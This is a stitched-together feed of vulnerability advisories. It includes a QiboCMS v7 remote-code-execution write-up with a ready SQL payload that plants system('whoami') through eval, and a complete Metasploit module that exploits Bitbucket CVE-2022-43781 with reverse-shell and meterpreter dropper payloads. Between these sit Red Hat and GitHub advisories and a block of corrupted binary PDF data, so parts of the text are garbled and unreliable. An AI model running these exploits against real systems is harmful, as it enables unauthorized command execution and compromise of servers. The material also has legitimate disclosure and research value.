The Request package through 2.88.2 for Node.js allows a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

**Server-Side Request Forgery in Request**

Moderate severity GitHub Reviewed Published Mar 16, 2023 to the GitHub Advisory Database • Updated Mar 16, 2023

GHSA-p8p7-x288-28g6: Server-Side Request Forgery in Request

** UNSUPPORTED WHEN ASSIGNED ** The Request package through 2.88.1 for Node.js allows a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

%PDF-1.3 %��������� 3 0 obj << /Filter /FlateDecode /Length 1549 >> stream x�WYoE~�\_Q� ������\`��Np R"V��!�r'A��\_�1۳��\]i{v��ί����tE\_�4�����Do��裢����9v��7Ӿ�|%�2�}9�B���9ݿOώN����!=:>� t�g)h+L����"y���T�iR�������O���>� 㜒e'\[��n�&��H<C�o��ʓgG�5�� ��QB9)y���� 09��;(ۑlݙ�HB;�"�\`��.�X��W4{!� � (�Eyy�l7��&��d\`\`0d�06�H.!�V���Xw��.���E�,�l��';�/;��#�ۢ��l��鲛�(��\]�I�B�}�:F�R8��'B)��Р�BLɔ�ug�;��x���j���z������$b��\\�p�<( �%�(��\`fJ!\*(�Wɹz!�t��\`�وI\`.� �U� {�$~�7�eX��%���k��ƽ�)�X�=)4�����x��\`�ɫ��K^���٘��a<\[� Ei�����|J'�͂�Ђp���WosY?<�\\^���?�"H��A�m� �\*iy�^I�\*���H�NNj�%y#�f��:�� j�Ŗ��ev|���T�,�qr�kP���裰�"�H�� x3>)�@�Q�Mp�>���l�P:�T�F��8K�sJ���\[SjKJ�=d�7�#0P�|-�6b�y;g��0���30�Z@�>� 5�����N�,7�5ڏɵ0S�����mˁ���\`O��9��{Ϫ�a+���nw9Å٥�2ר&�"Z����^�\\�ߩ�n�o�%�}ce6lf��!�U��@n�@�����.��\[�hg���-��\]��ro ��RS��B�EW�����CWsS��51�:�JF�4�:=�:����1RS�C?\`��p�6��P9�)�1�: PlR�0�����\_������ Գ�\[��7��u-�ȕA���Acm:%RhhRY�Ѵ��pR� ?0o����)4Z�����0Zǝ2hV��n���!�J<8p�\[HI��I�׃�xk�L�w�nb�;�߁�6�V��=�>���j\[�ؙd�5�+X}�im0R��)4�}���T�6-�i����b\]f\\\]fj��n���)�m������gQEy� 4�\]�"�(�h"�\]V�O�pc��l�R'�&g�����l�pR8w��+�����?�N��Ռo�c}9�8z�\_�U�F�1�R\`h\\�$�2c0�y�T�E!GпZa3�7GYG�8AQ�U�5�\[\[dU��\_�l��\`�����~����+����a� ۳����K}�~��Ktg���UH�-QsM��A�s4#v����tM����G�!���^�<8y�{�����'�t���ⲧ�z��d�dFgмѤ,�0�\`D��V��-lŔO.�lC���d��yo�\]�ב�

CVE-2023-28155

Qibosoft QiboCMS v7 was discovered to contain a remote code execution (RCE) vulnerability via the Get_Title function at label_set_rs.php

**qibo\_v7-Rce****label\_set\_rs.php**

    lobal $db,$pre,$timestamp,$webdb,$TB_url;
    	//分类的话,对于分表的情况,要特别处理,不支持其它频道调用,会出错
    	if($format[SYS]=='fenlei'&&!$rs[posttime]){
    		global $Fid_db;
    		$_erp=$Fid_db[tableid][$rs[fid]];		
    		$rs=$db->get_one("SELECT * FROM {$pre}{$format[wninfo]}content$_erp WHERE id='$rs[id]' ");
    	}
    
    	//读取自定义字段的表,方便调用,如果声明了noReadMid就不要读了
    	if($format[wninfo]&&$rs[mid]&&!$format[noReadMid]){
    		$_rss=$db->get_one("SELECT * FROM {$pre}{$format[wninfo]}content_{$rs[mid]} WHERE id='$rs[id]' ");
    		$_rss && $rs=$rs+$_rss;
    	//文章要读取自定义字段的表,方便调用
    	}elseif($format[SYS]=='artcile'&&$rs[mid]){
    		$_rss=$db->get_one("SELECT * FROM {$pre}article_content_{$rs[mid]} WHERE aid='$rs[aid]' ");
    		$_rss && $rs=$rs+$_rss;
    	}
    
    	//扩展接口,少用
    	if($format[eval_code]){
    
    		eval($format[eval_code]);
    
    	}
    

    $ format is the parameter parameter parameter parameter parameter parameter parameter parameter parameter that we pass in, $formati [eval_code] is a function when there is a value and a value.
    

    function Get_Title($format){
    	global $db,$webdb,$pre,$ModuleDB;
    	
    	//CMS万能文章专题里的文章
    
    	if($format['SYS']=='CMS'&&$format['ctype']=='special'){
    		return CMS_special($format);
    	}
    
    
    	//方便下面得到URL的真实列表地址
    	$page=1;
    	
    	if(strstr($format[sql],'$GLOBALS[')){
    		eval("\$format[sql]=\"$format[sql]\";");
    	}
    	if(strstr($format[sql2],'$GLOBALS[')){
    		eval("\$format[sql2]=\"$format[sql2]\";");
    	}
    	//此处屏障报错,主要是处理不同版本之间存在的一些差异性问题
    	$query=$db->query("$format[sql]",'','0');
    	if(!$query){
    		return ;
    	}
     
    	//辅助模板存在,并且辅助SQL存在的话,要读数据库
    	if($format[tplpart_2code]&&$format[sql2]){
    		$query2=$db->query($format[sql2],'','0');
    		$rs2=$db->fetch_array($query2);
    		$rs2=label_set_rs($format,$rs2);
    	}
    }
    

    Here $format[SYS] cannot be CMS and $format[sql] is a sql statement that can be executed accurately, and both $format[sql2] and $format[tplpart_2code] must be true, then you can enter label_set_rs and then enter js.php Get_Title is called in it.
    

**js.php**

    <?php
    error_reporting(0);extract($_GET);
    require_once(dirname(__FILE__)."/../data/config.php");
    if(!eregi("^([0-9]+)$",$id)){
    	die("document.write('ID不存在');");
    }
    $FileName=dirname(__FILE__)."/../cache/js/";
    
    $FileName.="{$id}.php";
    //默认缓存3分钟.
    if(!$webdb["cache_time_js"]){
    
    	$webdb["cache_time_js"]=3;
    }
    var_dump(!$webdb["cache_time_js"]);
    echo (time()-filemtime($FileName));
    
    
    if( (time()-filemtime($FileName))<($webdb["cache_time_js"]*60) ){
    	@include($FileName);
    	$show=str_replace(array("\n","\r","'"),array("","","\'"),stripslashes($show));
    	if($iframeID){	//框架方式不会拖慢主页面打开速度,推荐
    		//处理跨域问题
    		if($webdb[cookieDomain]){
    			echo "<SCRIPT LANGUAGE=\"JavaScript\">document.domain = \"$webdb[cookieDomain]\";</SCRIPT>";
    		}
    		echo "<SCRIPT LANGUAGE=\"JavaScript\">
    		parent.document.getElementById('$iframeID').innerHTML='$show';
    		</SCRIPT>";
    	}else{			//JS式会拖慢主页面打开速度,不推荐
    		echo "document.write('$show');";
    	}
    	exit;
    }
    
    require(dirname(__FILE__)."/"."global.php");
    require_once(ROOT_PATH."inc/label_funcation.php");
    
    	$query=$db->query(" SELECT * FROM {$pre}label WHERE lid='$id' ");
    
    	while( $rs=$db->fetch_array($query) ){
    		//读数据库的标签
    		if( $rs[typesystem] )
    		{
                unserialize($rs['code']);
    			$_array=unserialize($rs[code]);
                var_dump($_array);
    			$value=($rs[type]=='special')?Get_sp($_array):Get_Title($_array);
    			if(strstr($value,"(/mv)")){
    				$value=get_label_mv($value);
    			}
    			if($_array[c_rolltype])
    			{
    				$value="<marquee direction='$_array[c_rolltype]' scrolldelay='1' scrollamount='1' onmouseout='if(document.all!=null){this.start()}' onmouseover='if(document.all!=null){this.stop()}' height='$_array[roll_height]'>$value</marquee>";
    			}
    		}
    

    First of all, the $id here is passed in through $_GET['id'] and must be a number. The id is spliced with the sql statement. When the data is queried, it will enter a loop, and then determine whether $rs[tyoesystem] is true. If it is true, it will enter the loop, and then deserialize $rs[code], and then $rs[type] here cannot be special, and then the array will be passed to Get_Title.
    

 Here we can upload a sql file, create a 1.sql, and write the following statement.

    
    update  qb_label set code='a:6:{s:13:"tplpart_1code";s:4:"test";s:13:"tplpart_2code";s:4:"test";s:3:"SYS";s:7:"artcile";s:9:"eval_code";s:17:"system("whoami");";s:3:"sql";s:24:"select * from qb_article";s:4:"sql2";b:1;}',typesystem=1,type='code' where lid=741;
    

    Then upload, the lid here can be blasted.
    then visit
    

 Use successfully.

CVE-2023-27037: vul/2023-01-14.md at main · dienamer/vul

Red Hat Security Advisory 2023-1277-01 - An update for openstack-swift is now available for Red Hat OpenStack Platform. Red Hat Product Security has rated this update as having a security impact of Important.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform (openstack-swift) security update  
Advisory ID:       RHSA-2023:1277-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1277  
Issue date:        2023-03-15  
CVE Names:         CVE-2022-47950   
=====================================================================

1. Summary:

An update for openstack-swift is now available for Red Hat OpenStack  
Platform.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 13.0 - ELS - noarch  
Red Hat OpenStack Platform 13.0 for RHEL 7.6 EUS Server - noarch  
Red Hat OpenStack Platform 16.1 - noarch  
Red Hat OpenStack Platform 16.2 - noarch

3. Description:

OpenStack Object Storage (swift) aggregates commodity servers to  
 work together in clusters for reliable, redundant, and large-scale storage  
of static objects. Objects are written to multiple hardware devices in the  
data center, with the OpenStack software responsible for ensuring data  
replication and integrity across the cluster. Storage clusters can scale  
horizontally by adding new nodes, which are automatically configured.  
Should a node fail, OpenStack works to replicate its content from other  
active nodes. Because OpenStack uses software logic to ensure data  
replication and distribution across different devices, inexpensive  
commodity hard drives and servers can be used in lieu of more expensive  
equipment.

Security Fix(es):

* Arbitrary file access through custom S3 XML entities (CVE-2022-47950)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2160618 - CVE-2022-47950 openstack-swift: Arbitrary file access through custom S3 XML entities

6. Package List:

Red Hat OpenStack Platform 13.0 for RHEL 7.6 EUS Server:

Source:  
openstack-swift-plugin-swift3-1.12.1-1.el7ost.src.rpm

noarch:  
openstack-swift-plugin-swift3-1.12.1-1.el7ost.noarch.rpm

Red Hat OpenStack Platform 13.0 - ELS:

Source:  
openstack-swift-plugin-swift3-1.12.1-1.el7ost.src.rpm

noarch:  
openstack-swift-plugin-swift3-1.12.1-1.el7ost.noarch.rpm

Red Hat OpenStack Platform 16.1:

Source:  
openstack-swift-2.23.2-1.20230201163512.eef87ee.el8ost.src.rpm

noarch:  
openstack-swift-account-2.23.2-1.20230201163512.eef87ee.el8ost.noarch.rpm  
openstack-swift-container-2.23.2-1.20230201163512.eef87ee.el8ost.noarch.rpm  
openstack-swift-object-2.23.2-1.20230201163512.eef87ee.el8ost.noarch.rpm  
openstack-swift-proxy-2.23.2-1.20230201163512.eef87ee.el8ost.noarch.rpm  
python3-swift-2.23.2-1.20230201163512.eef87ee.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
openstack-swift-2.23.4-2.20220422185313.2829195.el8ost.src.rpm

noarch:  
openstack-swift-account-2.23.4-2.20220422185313.2829195.el8ost.noarch.rpm  
openstack-swift-container-2.23.4-2.20220422185313.2829195.el8ost.noarch.rpm  
openstack-swift-object-2.23.4-2.20220422185313.2829195.el8ost.noarch.rpm  
openstack-swift-proxy-2.23.4-2.20220422185313.2829195.el8ost.noarch.rpm  
python3-swift-2.23.4-2.20220422185313.2829195.el8ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-47950  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBI1RdzjgjWX9erEAQhRMw/8DHDgTPCWS06Nt5uj0+gIeydc5aahFYkY  
IjAJP8/rGGYaqsWAFTVyoWS9Inq/lWILm7+by5tthqlMC9QxRj+ZBp4FTdu9Vett  
VIll9T4zhG6b2kB0UxqpXvcj55Izd7Mrhds7oaHrMCIWm5UP/ln5shdK6r9shUSt  
Nr7MsN8vtffnpTP/5mR8AIevmHFAXNsHZZetnQ1cWRbviTEUmPQV3CLKexbqHj3q  
pAYXWKPtcb+yKwg4TS7at/cS8LRuNB0SdzpFFtJHQh0zwOl+jOg6BxDQUInMIyvB  
siyDeWwqhn+scFCkjsJETJRLMbxNoYge9UvTtFmIgTq2S7XOazhZY2XS7LhNnYPL  
S7+9A37xi78tNR1gJ9iV0SMtiLzjZ9GfPanvecDujyTntEAr2uJ4rXv2Jfl+ampv  
LpltVyJ/MIwDhptHN/zBUKMa5gLUe0wPSxl2exd9yrAEpgY2bxP2grgog0c6mo3N  
kXFR4VDiBSMZOFBIaDfl19o3l2SlLEy23PUVWutr+nnXbWGKj8vhjCBq9dXNOIL9  
Vea+4QO/K7mXLDSrdNiz4qaejtXbcNbVcsT1lQe1FOO2t+BFLMIxMNlyl+TejHS3  
gJcpZ07lUgZxo4ai0Jv6xCAfjB5Pj7rZZtE8PkkyPO2uAZ7vg6cSqEGP933WT/ke  
gDn9JuNohT4=  
=9q28  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1277-01

For various versions of Bitbucket, there is an authenticated command injection vulnerability that can be exploited by injecting environment variables into a user name. This module achieves remote code execution as the atlbitbucket user by injecting the GIT_EXTERNAL_DIFF environment variable, a null character as a delimiter, and arbitrary code into a user's user name. The value (payload) of the GIT_EXTERNAL_DIFF environment variable will be run once the Bitbucket application is coerced into generating a diff. This Metasploit module requires at least admin credentials, as admins and above only have the option to change their user name.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Git  include Msf::Exploit::Git::SmartHttp  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Bitbucket Environment Variable RCE',        'Description' => %q{          For various versions of Bitbucket, there is an authenticated command injection          vulnerability that can be exploited by injecting environment          variables into a user name. This module achieves remote code execution          as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment          variable, a null character as a delimiter, and arbitrary code into a user's          user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable          will be run once the Bitbucket application is coerced into generating a diff.          This module requires at least admin credentials, as admins and above          only have the option to change their user name.        },        'License' => MSF_LICENSE,        'Author' => [          'Ry0taK', # Vulnerability Discovery          'y4er', # PoC and blog post          'Shelby Pace' # Metasploit Module        ],        'References' => [          [ 'URL', 'https://y4er.com/posts/cve-2022-43781-bitbucket-server-rce/'],          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html'],          [ 'CVE', '2022-43781']        ],        'Platform' => [ 'win', 'unix', 'linux' ],        'Privileged' => true,        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],        'Targets' => [          [            'Linux Command',            {              'Platform' => 'unix',              'Type' => :unix_cmd,              'Arch' => [ ARCH_CMD ],              'Payload' => { 'Space' => 254 },              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'MaxLineChars' => 254,              'Type' => :linux_dropper,              'Arch' => [ ARCH_X86, ARCH_X64 ],              'CmdStagerFlavor' => %i[wget curl],              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }            }          ],          [            'Windows Dropper',            {              'Platform' => 'win',              'MaxLineChars' => 254,              'Type' => :win_dropper,              'Arch' => [ ARCH_X86, ARCH_X64 ],              'CmdStagerFlavor' => [ :psh_invokewebrequest ],              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }            }          ]        ],        'DisclosureDate' => '2022-11-16',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options(      [        Opt::RPORT(7990),        OptString.new('USERNAME', [ true, 'User name to log in with' ]),        OptString.new('PASSWORD', [ true, 'Password to log in with' ]),        OptString.new('TARGETURI', [ true, 'The URI of the Bitbucket instance', '/'])      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'login'),      'keep_cookies' => true    )    return CheckCode::Unknown('Failed to retrieve a response from the target') unless res    return CheckCode::Safe('Target does not appear to be Bitbucket') unless res.body.include?('Bitbucket')    nokogiri_data = res.get_html_document    footer = nokogiri_data&.at('footer')    return CheckCode::Detected('Failed to retrieve version information from Bitbucket') unless footer    version_info = footer.at('span')&.children&.text    return CheckCode::Detected('Failed to find version information in footer section') unless version_info    vers_matches = version_info.match(/v(\d+\.\d+\.\d+)/)    return CheckCode::Detected('Failed to find version info in expected format') unless vers_matches && vers_matches.length > 1    version_str = vers_matches[1]    vprint_status("Found version #{version_str} of Bitbucket")    major, minor, revision = version_str.split('.')    rev_num = revision.to_i    case major    when '7'      case minor      when '0', '1', '2', '3', '4', '5'        return CheckCode::Appears      when '6'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 18      when '7', '8', '9', '10', '11', '12', '13', '14', '15', '16'        return CheckCode::Appears      when '17'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 11      when '18', '19', '20'        return CheckCode::Appears      when '21'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 5      end    when '8'      print_status('Versions 8.* are vulnerable only if the mesh setting is disabled')      case minor      when '0'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 4      when '1'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 4      when '2'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 3      when '3'        return CheckCode::Appears if rev_num >= 0 && rev_num <= 2      when '4'        return CheckCode::Appears if rev_num == 0 || rev_num == 1      end    end    CheckCode::Detected  end  def default_branch    @default_branch ||= Rex::Text.rand_text_alpha(5..9)  end  def uname_payload(cmd)    "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(#{cmd})"  end  def log_in(username, password)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'login'),      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('login')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),      'keep_cookies' => true,      'vars_post' => {        'j_username' => username,        'j_password' => password,        '_atl_remember_me' => 'on',        'submit' => 'Log in'      }    )    fail_with(Failure::UnexpectedReply, 'Didn\'t retrieve a response') unless res    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'projects'),      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'No response from the projects page') unless res    unless res.body.include?('Logged in')      fail_with(Failure::UnexpectedReply, 'Failed to log in. Please check credentials')    end  end  def create_project    proj_uri = normalize_uri(target_uri.path, 'projects?create')    res = send_request_cgi(      'method' => 'GET',      'uri' => proj_uri,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Unable to access project creation page') unless res&.body&.include?('Create project')    vprint_status('Retrieving security token')    html_doc = res.get_html_document    token_data = html_doc.at('div//input[@name="atl_token"]')    fail_with(Failure::UnexpectedReply, 'Failed to find element containing \'atl_token\'') unless token_data    @token = token_data['value']    fail_with(Failure::UnexpectedReply, 'No token found') if @token.blank?    project_name = Rex::Text.rand_text_alpha(5..9)    project_key = Rex::Text.rand_text_alpha(5..9).upcase    res = send_request_cgi(      'method' => 'POST',      'uri' => proj_uri,      'keep_cookies' => true,      'vars_post' => {        'name' => project_name,        'key' => project_key,        'submit' => 'Create project',        'atl_token' => @token      }    )    fail_with(Failure::UnexpectedReply, 'Failed to receive response from project creation') unless res    fail_with(Failure::UnexpectedReply, 'Failed to create project') unless res['Location']&.include?(project_key)    print_status('Project creation was successful')    [ project_name, project_key ]  end  def create_repository    repo_uri = normalize_uri(target_uri.path, 'projects', @project_key, 'repos?create')    res = send_request_cgi(      'method' => 'GET',      'uri' => repo_uri,      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to access repo creation page') unless res    html_doc = res.get_html_document    dropdown_data = html_doc.at('li[@class="user-dropdown"]')    fail_with(Failure::UnexpectedReply, 'Failed to find dropdown to retrieve email address') if dropdown_data.blank?    email = dropdown_data&.at('span')&.[]('data-emailaddress')    fail_with(Failure::UnexpectedReply, 'Failed to retrieve email address from response') if email.blank?    repo_name = Rex::Text.rand_text_alpha(5..9)    res = send_request_cgi(      'method' => 'POST',      'uri' => repo_uri,      'keep_cookies' => true,      'vars_post' => {        'name' => repo_name,        'defaultBranchId' => default_branch,        'description' => '',        'scmId' => 'git',        'forkable' => 'false',        'atl_token' => @token,        'submit' => 'Create repository'      }    )    fail_with(Failure::UnexpectedReply, 'No response received from repo creation') unless res    res = send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => normalize_uri(target_uri.path, 'projects', @project_key, 'repos', repo_name, 'browse')    )    fail_with(Failure::UnexpectedReply, 'Repository was not created') if res&.code == 404    print_good("Successfully created repository '#{repo_name}'")    [ email, repo_name ]  end  def generate_repo_objects(email, repo_file_data = [], parent_object = nil)    txt_data = Rex::Text.rand_text_alpha(5..20)    blob_object = GitObject.build_blob_object(txt_data)    file_name = "#{Rex::Text.rand_text_alpha(4..10)}.txt"    file_data = {      mode: '100755',      file_name: file_name,      sha1: blob_object.sha1    }    tree_data = (repo_file_data.empty? ? [ file_data ] : [ file_data, repo_file_data ])    tree_obj = GitObject.build_tree_object(tree_data)    commit_obj = GitObject.build_commit_object({      tree_sha1: tree_obj.sha1,      email: email,      message: Rex::Text.rand_text_alpha(4..30),      parent_sha1: (parent_object.nil? ? nil : parent_object.sha1)    })    {      objects: [ commit_obj, tree_obj, blob_object ],      file_data: file_data    }  end  # create two files in two separate commits in order  # to view a diff and get code execution  def create_commits(email)    init_objects = generate_repo_objects(email)    commit_obj = init_objects[:objects].first    refs = {      'HEAD' => "refs/heads/#{default_branch}",      "refs/heads/#{default_branch}" => commit_obj.sha1    }    final_objects = generate_repo_objects(email, init_objects[:file_data], commit_obj)    repo_objects = final_objects[:objects] + init_objects[:objects]    new_commit = final_objects[:objects].first    new_file = final_objects[:file_data][:file_name]    git_uri = normalize_uri(target_uri.path, "scm/#{@project_key}/#{@repo_name}.git")    res = send_receive_pack_request(      git_uri,      refs['HEAD'],      repo_objects,      '0' * 40 # no commits should exist yet, so no branch tip in repo yet    )    fail_with(Failure::UnexpectedReply, 'Failed to push commit to repository') unless res    fail_with(Failure::UnexpectedReply, 'Git responded with an error') if res.body.include?('error:')    fail_with(Failure::UnexpectedReply, 'Git push failed') unless res.body.include?('unpack ok')    [ new_commit.sha1, commit_obj.sha1, new_file ]  end  def get_user_id(curr_uname)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'admin/users/view'),      'vars_get' => { 'name' => curr_uname }    )    matched_id = res.get_html_document&.xpath("//script[contains(text(), '\"name\":\"#{curr_uname}\"')]")&.first&.text&.match(/"id":(\d+)/)    fail_with(Failure::UnexpectedReply, 'No matches found for id of user') unless matched_id && matched_id.length > 1    matched_id[1]  end  def change_username(curr_uname, new_uname)    @user_id ||= get_user_id(curr_uname)    headers = {      'X-Requested-With' => 'XMLHttpRequest',      'X-AUSERID' => @user_id,      'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}"    }    vars = {      'name' => curr_uname,      'newName' => new_uname    }.to_json    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/admin/users/rename'),      'ctype' => 'application/json',      'keep_cookies' => true,      'headers' => headers,      'data' => vars    )    unless res      print_bad('Did not receive a response to the user name change request')      return false    end    unless res.body.include?(new_uname) || res.body.include?('GIT_EXTERNAL_DIFF')      print_bad('User name change was unsuccessful')      return false    end    true  end  def commit_uri(project_key, repo_name, commit_sha)    normalize_uri(      target_uri.path,      'rest/api/latest/projects',      project_key,      'repos',      repo_name,      'commits',      commit_sha    )  end  def view_commit_diff(latest_commit_sha, first_commit_sha, diff_file)    commit_diff_uri = normalize_uri(      commit_uri(@project_key, @repo_name, latest_commit_sha),      'diff',      diff_file    )    send_request_cgi(      'method' => 'GET',      'uri' => commit_diff_uri,      'keep_cookies' => true,      'vars_get' => { 'since' => first_commit_sha }    )  end  def delete_repository(username)    vprint_status("Attempting to delete repository '#{@repo_name}'")    repo_uri = normalize_uri(target_uri.path, 'projects', @project_key, 'repos', @repo_name.downcase)    res = send_request_cgi(      'method' => 'DELETE',      'uri' => repo_uri,      'keep_cookies' => true,      'headers' => {        'X-AUSERNAME' => username,        'X-AUSERID' => @user_id,        'X-Requested-With' => 'XMLHttpRequest',        'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",        'ctype' => 'application/json',        'Accept' => 'application/json, text/javascript'      }    )    unless res&.body&.include?('scheduled for deletion')      print_warning('Failed to delete repository')      return    end    print_good('Repository has been deleted')  end  def delete_project(username)    vprint_status("Now attempting to delete project '#{@project_name}'")    send_request_cgi( # fails to return a response      'method' => 'DELETE',      'uri' => normalize_uri(target_uri.path, 'projects', @project_key),      'keep_cookies' => true,      'headers' => {        'X-AUSERNAME' => username,        'X-AUSERID' => @user_id,        'X-Requested-With' => 'XMLHttpRequest',        'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",        'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/projects/#{@project_key}/settings",        'ctype' => 'application/json',        'Accept' => 'application/json, text/javascript, */*; q=0.01',        'Accept-Encoding' => 'gzip, deflate'      }    )    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'projects', @project_key),      'keep_cookies' => true    )    unless res&.code == 404      print_warning('Failed to delete project')      return    end    print_good('Project has been deleted')  end  def get_repo    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),      'keep_cookies' => true    )    unless res      print_status('Couldn\'t access repos page. Will create repo')      return []    end    json_data = JSON.parse(res.body)    unless json_data && json_data['size'] >= 1      print_status('No accessible repositories. Will attempt to create a repo')      return []    end    repo_data = json_data['values'].first    repo_name = repo_data['slug']    project_key = repo_data['project']['key']    unless repo_name && project_key      print_status('Could not find repo name and key. Creating repo')      return []    end    [ repo_name, project_key ]  end  def get_repo_info    unless @project_name && @project_key      print_status('Failed to find valid project information. Will attempt to create repo')      return nil    end    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri('projects', @project_key, 'repos', @project_name, 'commits'),      'keep_cookies' => true    )    unless res      print_status("Failed to access existing repository #{@project_name}")      return nil    end    html_doc = res.get_html_document    commit_data = html_doc.search('a[@class="commitid"]')    unless commit_data && commit_data.length > 1      print_status('No commits found for existing repo')      return nil    end    latest_commit = commit_data[0]['data-commitid']    prev_commit = commit_data[1]['data-commitid']    file_uri = normalize_uri(commit_uri(@project_key, @project_name, latest_commit), 'changes')    res = send_request_cgi(      'method' => 'GET',      'uri' => file_uri,      'keep_cookies' => true    )    return nil unless res    json = JSON.parse(res.body)    return nil unless json['values']    path = json['values']&.first&.dig('path')    return nil unless path    [ latest_commit, prev_commit, path['name'] ]  end  def exploit    @use_public_repo = true    datastore['GIT_USERNAME'] = datastore['USERNAME']    datastore['GIT_PASSWORD'] = datastore['PASSWORD']    if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank?      fail_with(Failure::BadConfig, 'No credentials to log in with.')    end    log_in(datastore['USERNAME'], datastore['PASSWORD'])    @curr_uname = datastore['USERNAME']    @project_name, @project_key = get_repo    @repo_name = @project_name    @latest_commit, @first_commit, @diff_file = get_repo_info    unless @latest_commit && @first_commit && @diff_file      @use_public_repo = false      @project_name, @project_key = create_project      email, @repo_name = create_repository      @latest_commit, @first_commit, @diff_file = create_commits(email)      print_good("Commits added: #{@first_commit}, #{@latest_commit}")    end    print_status('Sending payload')    case target['Type']    when :win_dropper      execute_cmdstager(linemax: target['MaxLineChars'] - uname_payload('cmd.exe /c ').length, noconcat: true, temp: '.')    when :linux_dropper      execute_cmdstager(linemax: target['MaxLineChars'], noconcat: true)    when :unix_cmd      execute_command(payload.encoded.strip)    end  end  def cleanup    if @curr_uname != datastore['USERNAME']      print_status("Changing user name back to '#{datastore['USERNAME']}'")      if change_username(@curr_uname, datastore['USERNAME'])        @curr_uname = datastore['USERNAME']      else        print_warning('User name is still set to payload.' \                      "Please manually change the user name back to #{datastore['USERNAME']}")      end    end    unless @use_public_repo      delete_repository(@curr_uname) if @repo_name      delete_project(@curr_uname) if @project_name    end  end  def execute_command(cmd, _opts = {})    if target['Platform'] == 'win'      curr_payload = (cmd.ends_with?('.exe') ? uname_payload("cmd.exe /c #{cmd}") : uname_payload(cmd))    else      curr_payload = uname_payload(cmd)    end    unless change_username(@curr_uname, curr_payload)      fail_with(Failure::UnexpectedReply, 'Failed to change user name to payload')    end    view_commit_diff(@latest_commit, @first_commit, @diff_file)    @curr_uname = curr_payload  endend

Bitbucket Environment Variable Remote Command Injection

Red Hat Security Advisory 2023-1275-01 - An update for etcd is now available for Red Hat OpenStack Platform. Issues addressed include a denial of service vulnerability.

